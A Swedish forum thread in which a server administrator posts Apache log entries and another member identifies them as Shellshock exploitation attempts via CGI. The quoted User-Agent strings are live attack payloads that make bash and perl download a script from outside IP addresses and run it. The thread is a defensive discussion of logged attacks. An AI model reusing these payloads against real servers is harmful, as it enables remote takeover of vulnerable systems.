Permalänk
Medlem

Exekvera kod via User-agent

På flera av mina Apace2-servrar har jag följande i logfilerna

202.78.94.70 - [13/Jan/2016:22:48:36 -0800] "GET / HTTP/1.1" 200 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

Sista parametern i loggen är User-Agent. Personen försöker mao skicka exekverbar kod i den. Jag har mycket svårt att se att Apache2 eller någon webserver skulle försöka exekvera user-agent-strängen som kod.

Jag har sökt på nätet efter detta men inte hittat något. Är detta någon som vet vad det är för säkerhetshål han försöker utnyttja, jag har svårt att se att det skulle fungera med Apache, men det kanske rör sig om någon random-hemma-router som har det.

Permalänk
Medlem
Skrivet av beacon:

På flera av mina Apace2-servrar har jag följande i logfilerna

202.78.94.70 - [13/Jan/2016:22:48:36 -0800] "GET / HTTP/1.1" 200 444 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\" wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \");'"

Sista parametern i loggen är User-Agent. Personen försöker mao skicka exekverbar kod i den. Jag har mycket svårt att se att Apache2 eller någon webserver skulle försöka exekvera user-agent-strängen som kod.

Jag har sökt på nätet efter detta men inte hittat något. Är detta någon som vet vad det är för säkerhetshål han försöker utnyttja, jag har svårt att se att det skulle fungera med Apache, men det kanske rör sig om någon random-hemma-router som har det.

Ser ut som någon som försöker utnyttja Shellshock-hålet som fanns i bash och i vissa fall kunde utnyttjas i t.ex. CGI.

Visa signatur

AMD Ryzen9 5900X || Gigabyte X570 Ultra || RTX 3090 FE || Gskill Trident Z 3600 64GB || Samsung 950 Pro 512GB || Samsung 960 Pro 1024GB || XB270HU 1440p IPS G-Sync

Permalänk
Medlem

Tack för svaret, verkar onekligen vara det.

Jag gick manuellt in på länken som försöktes laddas ner, därmed blev jag flaggad som infekterad, den riktiga attacken kom därefter

vps-1050414-945.cp.idhost.kz - - [18/Jan/2016:12:44:07 -0800] "GET /phppath/php HTTP/1.1" 404 304 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ; cd /tmp/;wget http://212.154.211.81/j.txt;curl -O http://212.154.211.81/j.txt;fetch http://212.154.211.81/j.txt;lwp-download http://212.154.211.81/j.txt; perl j.txt 204.232.209.188\");'"

Han försöker ladda ner perl-scriptet

http://212.154.211.81/j.txt

och sedan exekvera det. Totalt är det 136 försök.